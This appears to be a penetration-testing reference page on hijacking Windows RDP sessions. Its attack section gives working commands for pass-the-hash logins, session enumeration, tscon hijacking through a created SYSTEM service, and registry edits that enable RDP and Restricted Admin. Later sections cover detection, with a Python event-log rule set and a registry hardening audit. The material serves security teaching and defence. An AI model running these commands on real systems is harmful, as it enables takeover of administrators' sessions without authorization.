RDP Hijacking

Overview

RDP hijacking takes over an existing disconnected (or active) RDP session without the user's password. When a user disconnects from RDP (instead of logging off), their session remains active on the server. A SYSTEM-level user can switch into that session using tscon, effectively impersonating the disconnected user. This is particularly powerful when a Domain Admin has a disconnected session.

ATT&CK Mapping

  • Tactic: TA0008 - Lateral Movement
  • Technique: T1021.001 - Remote Services: Remote Desktop Protocol
  • Technique: T1563.002 - Remote Service Session Hijacking: RDP Hijacking

Prerequisites

  • SYSTEM privileges on a Windows server with active/disconnected RDP sessions
  • RDP service enabled on the target (TCP 3389)
  • For standard RDP: valid credentials and network access to TCP 3389

Techniques

Standard RDP Access

# xfreerdp3
# https://github.com/FreeRDP/FreeRDP
xfreerdp3 /v:<target> /u:<user> /p:<password> /d:<domain>

# With pass-the-hash (restricted admin mode must be enabled on target)
xfreerdp3 /v:<target> /u:<user> /pth:<NThash> /d:<domain>

# Dynamic resolution (note: + prefix enables boolean toggles in xfreerdp3)
xfreerdp3 /v:<target> /u:<user> /p:<password> +dynamic-resolution

# Share a local directory
xfreerdp3 /v:<target> /u:<user> /p:<password> /drive:share,/local/path

# NetExec — check RDP access
# https://github.com/Pennyw0rth/NetExec
nxc rdp <target> -u <user> -p <password>

RDP Session Hijacking

Requires SYSTEM on the target server. No password needed for the hijacked session:

:: List active and disconnected sessions
query user
:: Or:
qwinsta

:: Output example:
:: USERNAME    SESSIONNAME   ID  STATE    TYPE
:: admin       rdp-tcp#0      1  Active
:: domainadmin                 2  Disc        ← Disconnected session, ripe for hijacking

:: Hijack session 2 (as SYSTEM)
:: If already SYSTEM:
tscon 2 /dest:console

:: If not yet SYSTEM, create a service to run tscon as SYSTEM:
sc create hijack binpath= "cmd.exe /k tscon 2 /dest:console"
net start hijack

The tscon command switches the specified session to the current console. When run as SYSTEM, it does not require the target user's password.

Enabling RDP (Post-Exploitation)

If RDP is disabled and you have admin access:

:: Enable RDP via registry
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

:: Allow through firewall
netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes

:: Add user to Remote Desktop Users
net localgroup "Remote Desktop Users" <user> /add

Restricted Admin Mode

Restricted Admin mode allows RDP with NTLM hash (pass-the-hash) but does not send credentials to the remote host:

:: Enable Restricted Admin on target (requires admin)
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f

# Connect with pass-the-hash
xfreerdp3 /v:<target> /u:<user> /pth:<NThash> /d:<domain>

Detection Methods

Network-Based Detection

  • RDP connections (TCP 3389) from unexpected sources
  • RDP connections during unusual hours or from non-admin workstations

Host-Based Detection

  • Event ID 4778 — session reconnected (RDP hijacking indicator)
  • Event ID 4779 — session disconnected
  • Service creation with tscon in the binary path
  • qwinsta or query user execution (session enumeration)
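The host-based indicators above can be turned into a small triage rule set. The following is an added example, not code from the original page: it scans a handful of constructed Windows events (not real logs) for the three signals listed, a session reconnect (4778), a service installed with tscon in its binary path (System log 7045), and a process-creation event (4688) for the session-enumeration tools. The field names follow the EventData names of those events; the heuristic that a tscon reconnect to the console shows up as a 4778 with a Client Address of LOCAL is an assumption of this example that should be confirmed against your own telemetry.

```python
"""Flag RDP session-hijacking indicators in exported Windows events (added example)."""
from dataclasses import dataclass
import re

# Constructed sample events: a normal RDP reconnect from a workstation, a
# console reconnect with a LOCAL client address (what a tscon /dest:console
# switch is assumed to produce), a service whose binary path invokes tscon,
# and two process launches, one of them the session-enumeration tool qwinsta.
SAMPLE_EVENTS = [
    {"EventID": 4778, "AccountName": "admin", "SessionName": "RDP-Tcp#0",
     "ClientName": "WS01", "ClientAddress": "10.0.0.15"},
    {"EventID": 4778, "AccountName": "domainadmin", "SessionName": "Console",
     "ClientName": "SRV01", "ClientAddress": "LOCAL"},
    {"EventID": 7045, "ServiceName": "hijack",
     "ImagePath": "cmd.exe /k tscon 2 /dest:console", "AccountName": "LocalSystem"},
    {"EventID": 4688, "SubjectUserName": "SYSTEM",
     "NewProcessName": r"C:\Windows\System32\qwinsta.exe", "CommandLine": "qwinsta"},
    {"EventID": 4688, "SubjectUserName": "helpdesk",
     "NewProcessName": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad"},
]


@dataclass(frozen=True)
class Finding:
    severity: str   # "high" or "low"
    rule: str       # short rule name for routing/tuning
    detail: str     # human-readable explanation


# tscon or tscon.exe anywhere in a command line / image path
TSCON_RE = re.compile(r"\btscon(\.exe)?\b", re.IGNORECASE)
# "query user" runs query.exe; qwinsta.exe is the other enumeration binary
ENUM_PROCS = {"qwinsta.exe", "query.exe"}


def check_event(ev):
    """Return a Finding for one event dict, or None if nothing matched."""
    eid = ev.get("EventID")
    if eid == 7045 and TSCON_RE.search(ev.get("ImagePath", "")):
        return Finding("high", "service-tscon",
                       f"service {ev['ServiceName']!r} installed with "
                       f"binary path {ev['ImagePath']!r}")
    if eid == 4778 and ev.get("ClientAddress", "").upper() == "LOCAL":
        # Assumption: a reconnect switched to the console by tscon carries
        # a LOCAL client address rather than the remote client's IP.
        return Finding("high", "local-reconnect",
                       f"session of {ev['AccountName']} reconnected to "
                       f"{ev['SessionName']} from LOCAL")
    if eid == 4688:
        exe = ev.get("NewProcessName", "").rsplit("\\", 1)[-1].lower()
        if exe in ENUM_PROCS:
            return Finding("low", "session-enum",
                           f"{ev['SubjectUserName']} ran {exe}")
    return None


def scan(events):
    """Run every event through check_event and keep the findings, in order."""
    return [f for f in (check_event(e) for e in events) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.rule}: {f.detail}")
```

The LOCAL-reconnect rule is the noisiest of the three on workstations, where fast user switching and physical console logons also reconnect sessions locally, so scope it to servers and treat a 4778 that lands within minutes of a 7045 with tscon in the path as the strong signal; the session-enumeration rule is informational on its own and is there to provide context for the other two.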

Mitigation Strategies

  • Log off instead of disconnect — enforce logoff on disconnect via GPO
  • Set session time limits — automatically log off disconnected sessions after a timeout
  • Network Level Authentication (NLA) — requires authentication before session is established
  • Restrict RDP access — limit RDP to specific admin networks via firewall rules
  • Disable Restricted Admin — prevents pass-the-hash over RDP (unless specifically needed)
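Several of these mitigations are visible as registry values once the GPO has applied, so they can be audited from the text that `reg query` prints on the host. The following is an added example, not code from the original page: it parses constructed `reg query` output (not a capture from a real host) and compares it with a hardened baseline. The value names used, fResetBroken and MaxDisconnectionTime under the Terminal Services policy key, UserAuthentication under the RDP-Tcp listener, and DisableRestrictedAdmin under Lsa (the last one is the key the page itself uses), are the standard ones, but the one-hour disconnect limit and the interpretation of absent values are assumptions of this example.

```python
"""Audit RDP-hardening registry values from `reg query` output (added example)."""
import re

# Constructed sample of what `reg query <key>` prints; one block per key.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services
    fResetBroken    REG_DWORD    0x1
    MaxDisconnectionTime    REG_DWORD    0x0

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
    UserAuthentication    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    DisableRestrictedAdmin    REG_DWORD    0x0
"""

KEY_TS_POLICY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services"
KEY_RDP_TCP = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
KEY_LSA = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"

# Assumed limit: disconnected sessions must be logged off within one hour.
ONE_HOUR_MS = 60 * 60 * 1000

# (key, value name, predicate over the DWORD or None if absent, mitigation)
BASELINE = [
    (KEY_TS_POLICY, "fResetBroken", lambda v: v == 1,
     "end (log off) the session when the time limit is reached"),
    (KEY_TS_POLICY, "MaxDisconnectionTime", lambda v: v is not None and 0 < v <= ONE_HOUR_MS,
     "log off disconnected sessions after a timeout (0 or absent means never)"),
    (KEY_RDP_TCP, "UserAuthentication", lambda v: v == 1,
     "require Network Level Authentication"),
    # Absent is treated as disabled here (assumption); 0 explicitly enables it.
    (KEY_LSA, "DisableRestrictedAdmin", lambda v: v is None or v == 1,
     "keep Restricted Admin mode disabled unless needed"),
]

# "    Name    REG_TYPE    value"
VALUE_RE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s+(.*?)\s*$")


def parse_reg_query(text):
    """Map (key, value name) -> int for REG_DWORD values, raw string otherwise."""
    values = {}
    key = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line[0].isspace():          # unindented line: a key path
            key = line.strip()
            continue
        m = VALUE_RE.match(line)
        if m and key:
            name, rtype, raw = m.groups()
            values[(key, name)] = int(raw, 16) if rtype == "REG_DWORD" else raw
    return values


def audit(values):
    """Return one finding string per baseline entry that is not satisfied."""
    findings = []
    for key, name, ok, purpose in BASELINE:
        v = values.get((key, name))
        if not ok(v):
            findings.append(f"{name} = {v!r} under {key.rsplit(chr(92), 1)[-1]}: {purpose}")
    return findings


if __name__ == "__main__":
    for finding in audit(parse_reg_query(SAMPLE_REG_QUERY)):
        print("FAIL", finding)
```

On a real host, feed it the concatenated output of `reg query` for the three keys; the policy key only exists once the GPO has applied, so an empty policy block is itself a finding for the first two entries.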

References

Official Documentation

MITRE ATT&CK